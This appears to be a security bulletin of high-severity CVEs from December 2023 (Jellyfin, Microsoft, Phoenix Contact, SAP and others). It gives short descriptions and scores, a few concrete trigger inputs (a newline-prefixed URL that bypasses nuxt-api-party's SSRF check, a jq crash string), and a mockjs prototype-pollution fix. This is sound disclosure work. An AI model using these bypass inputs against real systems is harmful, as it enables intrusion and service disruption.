jellyfin — jellyfin Jellyfin is a system for managing and streaming media. Prior to version 10.8.13, the `/System/MediaEncoder/Path` endpoint executes an arbitrary file using `ProcessStartInfo` via the `ValidateVersion` function. A malicious administrator can set up a network share and supply a UNC path to `/System/MediaEncoder/Path` which points to an executable on the network share, causing Jellyfin server to run the executable in the local context. The endpoint was removed in version 10.8.13. 2023-12-13 7.2 CVE-2023-48702
security-advisories@github.com
jfinalcms_project — jfinalcms JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter. 2023-12-10 7.5 CVE-2023-50449
cve@mitre.org
johannschopplich — nuxt_api_party `nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `\nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. “To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.”. This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previous method of detecting absolute URLs. 2023-12-09 7.5 CVE-2023-49799
security-advisories@github.com
johannschopplich — nuxt_api_party `nuxt-api-party` is an open source module to proxy API requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. fetchOptions are obtained directly from the request body. A malicious user can construct a URL known to not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively resulting in a denial of service. This issue has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should limit ofetch options. 2023-12-09 7.5 CVE-2023-49800
security-advisories@github.com
jqlang — jq decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the " []-1.2e-1111111111" input. 2023-12-11 7.5 CVE-2023-49355
cve@mitre.org
jruby — jruby-openssl The jruby-openssl gem before 0.6 for JRuby mishandles SSL certificate validation. 2023-12-12 7.5 CVE-2009-4123
cve@mitre.org
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in FTP service of HMI GC-A2 series. If a remote unauthenticated attacker sends specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-41963
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in commplex-link service of HMI GC-A2 series. If a remote unauthenticated attacker sends specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49140
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in rfe service of HMI GC-A2 series. If a remote unauthenticated attacker sends specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49143
vultures@jpcert.or.jp
jtekt — gc-a22w-cw_firmware Denial-of-service (DoS) vulnerability exists in NetBIOS service of HMI GC-A2 series. If a remote unauthenticated attacker sends specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur. 2023-12-12 7.5 CVE-2023-49713
vultures@jpcert.or.jp
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information. 2023-12-15 9.8 CVE-2023-48392
twcert@cert.org.tw
kaifa_technology — webitr Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 8.8 CVE-2023-48394
twcert@cert.org.tw
kalcaddle — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. 2023-12-16 7.3 CVE-2023-6848
cna@vuldb.com
kalcaddle — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. 2023-12-16 7.3 CVE-2023-6849
cna@vuldb.com
keycloak — keycloak An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (> 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then opens the “consents” tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system. 2023-12-14 7.7 CVE-2023-6563
secalert@redhat.com
koajs — cross-origin_resource_sharing_for_koa @koa/cors npm provides Cross-Origin Resource Sharing (CORS) for koa, a web framework for Node.js. Prior to version 5.0.0, the middleware operates in a way that if an allowed origin is not provided, it will return an `Access-Control-Allow-Origin` header with the value of the origin from the request. This behavior completely disables one of the most crucial elements of browsers – the Same Origin Policy (SOP), this could cause a very serious security threat to the users of this middleware. If such behavior is expected, for instance, when middleware is used exclusively for prototypes and not for production applications, it should be heavily emphasized in the documentation along with an indication of the risks associated with such behavior, as many users may not be aware of it. Version 5.0.0 fixes this vulnerability. 2023-12-11 7.5 CVE-2023-49803
security-advisories@github.com
labring — laf Laf is a cloud development platform. Prior to version 1.0.0-beta.13, the control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in secret and configmap. In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact. When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here. Sensitive information in the secret and configmap can be read through the k8s envFrom field. In a privatization environment, when `namespaceConf.fixed` is marked, it may lead to the leakage of sensitive information in the system. As of time of publication, it is unclear whether any patches or workarounds exist. 2023-12-12 8.9 CVE-2023-48225
security-advisories@github.com
libreoffice — libreoffice Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins. In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system. 2023-12-11 8.8 CVE-2023-6185
security@documentfoundation.org
libreoffice — libreoffice Insufficient macro permission validation of The Document Foundation LibreOffice allows an attacker to execute built-in macros without warning. In affected versions LibreOffice supports hyperlinks with macro or similar built-in command targets that can be executed when activated without warning the user. 2023-12-11 8.8 CVE-2023-6186
security@documentfoundation.org
linecorp — line An issue in studio kent mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2023-12-08 8.2 CVE-2023-43305
cve@mitre.org
linux — kernel An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information. 2023-12-08 7.1 CVE-2023-6606
secalert@redhat.com
linux — kernel An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information. 2023-12-08 7.1 CVE-2023-6610
secalert@redhat.com
mattermost — mattermost Mattermost fails to validate if a relative path is passed in /plugins/playbooks/api/v0/telemetry/run/ as a telemetry run ID, allowing an attacker to use a path traversal payload that points to a different endpoint leading to a CSRF attack. 2023-12-12 8.8 CVE-2023-45316
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to check the length when setting the title in a run checklist in Playbooks, allowing an attacker to send a specially crafted request and crash the Playbooks plugin. 2023-12-12 7.5 CVE-2023-45847
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to validate the type of the “reminder” body request parameter allowing an attacker to crash the Playbook Plugin when updating the status dialog. 2023-12-12 7.5 CVE-2023-49607
responsibledisclosure@mattermost.com
mgt-commerce — cloudpanel File-Manager in MGT CloudPanel 2.0.0 through 2.3.2 allows the lowest privilege user to achieve OS command injection by changing file ownership and changing file permissions to 4755. 2023-12-08 8.8 CVE-2023-46157
cve@mitre.org
microsoft — azure_connected_machine_agent Azure Connected Machine Agent Elevation of Privilege Vulnerability 2023-12-12 7.3 CVE-2023-35624
secure@microsoft.com
microsoft — dynamics_365 Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-35621
secure@microsoft.com
microsoft — microsoft_malware_protection_platform Microsoft Defender Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-36010
secure@microsoft.com
microsoft — microsoft_power_platform Microsoft Power Platform Connector Spoofing Vulnerability 2023-12-12 9.6 CVE-2023-36019
secure@microsoft.com
microsoft — windows Windows DPAPI (Data Protection Application Programming Interface) Spoofing Vulnerability 2023-12-12 7.5 CVE-2023-36004
secure@microsoft.com
microsoft — windows Windows Telephony Server Elevation of Privilege Vulnerability 2023-12-12 7.5 CVE-2023-36005
secure@microsoft.com
microsoft — windows_10 Windows MSHTML Platform Remote Code Execution Vulnerability 2023-12-12 8.1 CVE-2023-35628
secure@microsoft.com
microsoft — windows_10 Internet Connection Sharing (ICS) Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35630
secure@microsoft.com
microsoft — windows_10 Microsoft ODBC Driver Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35639
secure@microsoft.com
microsoft — windows_10 Internet Connection Sharing (ICS) Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35641
secure@microsoft.com
microsoft — windows_10 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-36006
secure@microsoft.com
microsoft — windows_10 Win32k Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36011
secure@microsoft.com
microsoft — windows_10_1507 Windows Media Remote Code Execution Vulnerability 2023-12-12 7.8 CVE-2023-21740
secure@microsoft.com
microsoft — windows_10_1507 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35632
secure@microsoft.com
microsoft — windows_10_1507 Windows Kernel Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35633
secure@microsoft.com
microsoft — windows_10_1809 Windows Sysmain Service Elevation of Privilege 2023-12-12 7.8 CVE-2023-35644
secure@microsoft.com
microsoft — windows_10_1809 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36696
secure@microsoft.com
microsoft — windows_11 Windows Bluetooth Driver Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35634
secure@microsoft.com
microsoft — windows_11_21h2 Win32k Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35631
secure@microsoft.com
microsoft — windows_11_23h2 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36391
secure@microsoft.com
microsoft — windows_server_2008 Windows DNS Spoofing Vulnerability 2023-12-12 7.5 CVE-2023-35622
secure@microsoft.com
microsoft — windows_server_2012 DHCP Server Service Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-35638
secure@microsoft.com
microsoft — windows_server_2012 DHCP Server Service Information Disclosure Vulnerability 2023-12-12 7.5 CVE-2023-35643
secure@microsoft.com
microweber — microweber An issue in microweber v.2.0.1 and fixed in v.2.0.4 allows a remote attacker to obtain sensitive information via the HTTP GET method. 2023-12-08 7.5 CVE-2023-48122
cve@mitre.org
milboj — flash_tool The flash_tool gem through 0.6.0 for Ruby allows command execution via shell metacharacters in the name of a downloaded file. 2023-12-12 9.8 CVE-2013-2513
cve@mitre.org
mlflow — mlflow Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-12 8.8 CVE-2023-6709
security@huntr.dev
mlflow — mlflow Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13 8.8 CVE-2023-6753
security@huntr.dev
mockjs — mock.js All versions of the package mockjs are vulnerable to Prototype Pollution via the Util.extend function due to missing check if the attribute resolves to the object prototype. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). User controlled inputs inside the extend() method of the Mock.Handler, Mock.Random, Mock.RE.Handler or Mock.Util, will allow an attacker to exploit this vulnerability. Workaround: By using a denylist of dangerous attributes, this weakness can be eliminated. Add the following line in the Util.extend function:

```js
if (["__proto__", "constructor", "prototype"].includes(name)) continue
```

```js
// src/mock/handler.js
Util.extend = function extend() {
    var target = arguments[0] || {},
        i = 1,
        length = arguments.length,
        options, name, src, copy, clone

    if (length === 1) {
        target = this
        i = 0
    }

    for (; i < length; i++) {
        options = arguments[i]
        if (!options) continue

        for (name in options) {
            if (["__proto__", "constructor", "prototype"].includes(name)) continue
            src = target[name]
            copy = options[name]

            if (target === copy) continue
            if (copy === undefined) continue

            if (Util.isArray(copy) || Util.isObject(copy)) {
                if (Util.isArray(copy)) clone = src && Util.isArray(src) ? src : []
                if (Util.isObject(copy)) clone = src && Util.isObject(src) ? src : {}

                target[name] = Util.extend(clone, copy)
            } else {
                target[name] = copy
            }
        }
    }

    return target
}
```

2023-12-08 8.2 CVE-2023-26158
report@snyk.io
moonlight-stream — moonlight-common-c Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 02b7742f4d19631024bd766bd2bb76715780004e. 2023-12-14 8.8 CVE-2023-42799
security-advisories@github.com
moonlight-stream — moonlight-common-c Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 24750d4b748fefa03d09fcfd6d45056faca354e0. 2023-12-14 8.8 CVE-2023-42800
security-advisories@github.com
moonlight-stream — moonlight-common-c Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit f57bd745b4cbed577ea654fad4701bea4d38b44c. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client. Achieving RCE is possible but unlikely, due to stack canaries in use by modern compiler toolchains. The published binaries for official clients Qt, Android, iOS/tvOS, and Embedded are built with stack canaries, but some unofficial clients may not use stack canaries. This vulnerability takes place after the pairing process, so it requires the client to be tricked into pairing to a malicious host. It is not possible to perform using a man-in-the-middle due to public key pinning that takes place during the pairing process. The bug was addressed in commit b2497a3918a6d79808d9fd0c04734786e70d5954. 2023-12-14 7.6 CVE-2023-42801
security-advisories@github.com
morpheus65535 — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, the /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50264
security-advisories@github.com
morpheus65535 — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50265
security-advisories@github.com
mullvad — mullvad_vpn An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM. 2023-12-10 7.8 CVE-2023-50446
cve@mitre.org
multisuns — easylog_web+ Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. A remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48388
twcert@cert.org.tw
multisuns — easylog_web+ Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48390
twcert@cert.org.tw
multisuns — easylog_web+ Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48389
twcert@cert.org.tw
nadatel — at-0402r_firmware Improper Authentication vulnerability in Nadatel DVR allows Information Elicitation. This issue affects DVR: from 3.0.0 before 9.9.0. 2023-12-13 7.5 CVE-2023-45801
vuln@krcert.or.kr
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link. 2023-12-09 8.1 CVE-2023-28868
cve@mitre.org
netgear — rbr750_firmware In Netgear Orbi RBR750 firmware before V7.2.6.21, there is a stack-based buffer overflow in /usr/sbin/httpd. 2023-12-08 9.8 CVE-2023-49007
cve@mitre.org
openjournalsystems — open_journal_systems A vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. 2023-12-11 8.8 CVE-2023-6671
cve-coordination@incibe.es
openzeppelin — contracts OpenZeppelin Contracts is a library for smart contract development. A merge issue when porting the 5.0.1 patch to the 4.9 branch caused a line duplication. In the version of `Multicall.sol` released in `@openzeppelin/contracts@4.9.4` and `@openzeppelin/contracts-upgradeable@4.9.4`, all subcalls are executed twice. Concretely, this exposes a user to unintentionally duplicate operations like asset transfers. The duplicated delegatecall was removed in version 4.9.5. The 4.9.4 version is marked as deprecated. Users are advised to upgrade. There are no known workarounds for this issue. 2023-12-09 7.5 CVE-2023-49798
security-advisories@github.com
palo_alto_networks — pan-os A DOM-Based cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a remote attacker to execute a JavaScript payload in the context of an administrator’s browser when they view a specifically crafted link to the PAN-OS web interface. 2023-12-13 8.8 CVE-2023-6790
psirt@paloaltonetworks.com
phoenix_contact — automation_worx_software_suite Incorrect Permission Assignment for Critical Resource vulnerability in multiple products of the PHOENIX CONTACT classic line allows a remote unauthenticated attacker to gain full access of the affected device. 2023-12-14 9.8 CVE-2023-46141
info@cert.vde.com
phoenix_contact — automation_worx_software_suite Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT classic line PLCs allows an unauthenticated remote attacker to modify some or all applications on a PLC. 2023-12-14 7.5 CVE-2023-46143
info@cert.vde.com
phoenix_contact — axc_f_1152 An incorrect permission assignment for critical resource vulnerability in PLCnext products allows a remote attacker with low privileges to gain full access on the affected devices. 2023-12-14 8.8 CVE-2023-46142
info@cert.vde.com
phoenix_contact — axc_f_1152 A download of code without integrity check vulnerability in PLCnext products allows a remote attacker with low privileges to compromise integrity on the affected engineering station and the connected devices. 2023-12-14 7.7 CVE-2023-46144
info@cert.vde.com
phoenix_contact — multiprog Incorrect Permission Assignment for Critical Resource vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to upload arbitrary malicious code and gain full access on the affected device. 2023-12-14 9.8 CVE-2023-0757
info@cert.vde.com
phoenix_contact — multiprog Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to download and execute applications without integrity checks on the device which may result in a complete loss of integrity. 2023-12-14 7.5 CVE-2023-5592
info@cert.vde.com
photon_os — photon_os The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer. 2023-12-13 7.8 CVE-2022-22942
security@vmware.com
phpems — phpems A vulnerability classified as critical was found in PHPEMS 6.x/7.0. Affected by this vulnerability is an unknown functionality in the library lib/session.cls.php of the component Session Data Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247357 was assigned to this vulnerability. 2023-12-10 8.8 CVE-2023-6654
cna@vuldb.com
phpgurukul — nipah_virus_testing_management_system A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6648
cna@vuldb.com
postgresql — postgresql A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server’s memory. 2023-12-10 8.8 CVE-2023-5869
secalert@redhat.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft an XSS payload and store that value within a dashboard component. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victim’s browser. 2023-12-14 7.6 CVE-2023-6364
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft an XSS payload and store that value within a device group. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victim’s browser. 2023-12-14 7.6 CVE-2023-6365
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft an XSS payload and store that value within Alert Center. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victim’s browser. 2023-12-14 7.6 CVE-2023-6366
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft an XSS payload and store that value within Roles. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victim’s browser. 2023-12-14 7.6 CVE-2023-6367
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold. 2023-12-14 7.5 CVE-2023-6595
security@progress.com
prolion — cryptospike Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Grafana authenticated user) or from the Loki REST API without authentication. 2023-12-12 9.1 CVE-2023-36649
cve@mitre.org
prolion — cryptospike Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation. 2023-12-12 8.8 CVE-2023-36646
cve@mitre.org
prolion — cryptospike Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer). 2023-12-12 8.2 CVE-2023-36648
cve@mitre.org
prolion — cryptospike A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens. 2023-12-12 7.5 CVE-2023-36647
cve@mitre.org
prolion — cryptospike A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages. 2023-12-12 7.2 CVE-2023-36650
cve@mitre.org
prolion — cryptospike Hidden and hard-coded credentials in ProLion CryptoSpike 3.0.15P2 allow remote attackers to login to web management as super-admin and consume the most privileged REST API endpoints via these credentials. 2023-12-12 7.2 CVE-2023-36651
cve@mitre.org
pyinstaller — pyinstaller PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if **all** the following are satisfied: 1. The user runs an application containing either `matplotlib` or `win32com`. 2. The application is run as administrator (or at least a user with higher privileges than the attacker). 3. The user’s temporary directory is not locked to that specific user (most likely due to `TMP`/`TEMP` environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between `shutil.rmtree()`’s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to `pyinstaller >= 5.13.1`. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-09 7.8 CVE-2023-49797
security-advisories@github.com
qnap — qts A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later 2023-12-08 7.2 CVE-2023-32968
security@qnapsecurity.com.tw
qnap — qts A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later 2023-12-08 7.2 CVE-2023-32975
security@qnapsecurity.com.tw
qnap — qvr_firmware An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QVR Firmware 5.0.0 and later 2023-12-08 8.8 CVE-2023-47565
security@qnapsecurity.com.tw
quarkus — quarkus A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions. 2023-12-09 9.1 CVE-2023-6394
secalert@redhat.com
raghu_goriya — mytube_playlist Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Raghu Goriya MyTube PlayList allows Reflected XSS. This issue affects MyTube PlayList: from n/a through 2.0.3. 2023-12-14 7.1 CVE-2023-48767
audit@patchstack.com
relyum — rely-pcie_firmware An issue discovered in Relyum RELY-PCIe 22.2.1 devices. The authorization mechanism is not enforced in the web interface, allowing a low-privileged user to execute administrative functions. 2023-12-13 8.8 CVE-2023-47573
cve@mitre.org
repox — repox An authentication bypass vulnerability has been found in Repox, which allows a remote user to send a specially crafted POST request, due to the lack of any authentication method, resulting in the alteration or creation of users. 2023-12-13 9.4 CVE-2023-6718
cve-coordination@incibe.es
repox — repox An unrestricted file upload vulnerability has been identified in Repox, which allows an attacker to upload malicious files via the transforamationfileupload function, due to the lack of proper file type validation controls, resulting in a full system compromise. 2023-12-13 9.8 CVE-2023-6723
cve-coordination@incibe.es
repox — repox An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application’s XML data processing in the fileupload function, resulting in interaction between the attacker and the server’s file system. 2023-12-13 8.3 CVE-2023-6721
cve-coordination@incibe.es
repox — repox A path traversal vulnerability has been detected in Repox, which allows an attacker to read arbitrary files on the running server, resulting in a disclosure of sensitive information. An attacker could access files such as application code or data, backend credentials, operating system files… 2023-12-13 7.5 CVE-2023-6722
cve-coordination@incibe.es
sap — @sap/xssec SAP BTP Security Services Integration Library ([Node.js] @sap/xssec) – versions < 3.6.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-49583
cna@sap.com
sap — business_objects_business_intelligence_platform SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS allowing an attacker to upload agnostic documents in the system which when opened by any other user could lead to high impact on integrity of the application. 2023-12-12 7.6 CVE-2023-42478
cna@sap.com
sap — cloud-security-client-go SAP BTP Security Services Integration Library ([Golang] github.com/sap/cloud-security-client-go) – versions < 0.17.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50424
cna@sap.com
sap — cloud-security-services-integration-library SAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) – versions below 2.17.0 and versions from 3.0.0 to before 3.3.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50422
cna@sap.com
